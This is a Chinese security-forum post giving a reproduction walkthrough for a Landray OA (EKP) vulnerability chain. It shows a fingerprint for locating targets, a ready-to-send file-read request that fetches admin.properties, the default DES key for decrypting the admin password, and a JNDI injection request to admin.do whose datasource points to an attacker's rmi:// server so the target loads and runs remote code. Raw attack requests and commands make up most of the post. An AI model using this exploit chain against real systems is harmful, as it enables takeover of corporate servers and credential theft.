问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
LandrayOA admin.do JNDI远程命令执行
# LandrayOA admin.do JNDI远程命令执行 ## 漏洞描述 深圳市Landray软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin...
LandrayOA admin.do JNDI远程命令执行 ============================= 漏洞描述 ---- 深圳市Landray软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限 漏洞影响 ---- LandrayOA 网络测绘 ---- app="Landray-OA系统" 漏洞复现 ---- 利用 `LandrayOA custom.jsp 任意文件读取漏洞` 读取配置文件 ```plain /WEB-INF/KmssConfig/admin.properties ``` 发送请求包 ```plain POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}} ``` ![img](https://shs3.b.qianxin.com/butian_public/f99803251239ad44f9748dcceaae6446402a2d951f655.jpg) 获取password后,使用 DES方法 解密,默认密钥为 `kmssAdminKey` ![img](https://shs3.b.qianxin.com/butian_public/f2228607e4b8b201bcdf2b010b6469bf1f566044fce1a.jpg) 访问后台地址使用解密的密码登录 ```plain http://xxx.xxx.xxx.xxx/admin.do ``` ![img](https://shs3.b.qianxin.com/butian_public/f37772876fad75dfa33859cb5b7744dccbbbb29dffea6.jpg) 使用工具执行命令: <https://github.com/welk1n/JNDI-Injection-Exploit> ```plain java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` 运行工具监听端口 ping dnslog测试 命令执行 (LandrayOA 默认使用的是 JDK 1.7) ```shell POST /admin.do HTTP/1.1 Host: Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967 Content-Length: 70 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Sec-Ch-Ua-Mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Origin: Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg ``` ![img](https://shs3.b.qianxin.com/butian_public/f516949586364cffd3536b540207abd19fd17fcaed993.jpg)
发表于 2024-07-12 18:44:15
阅读 ( 987 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!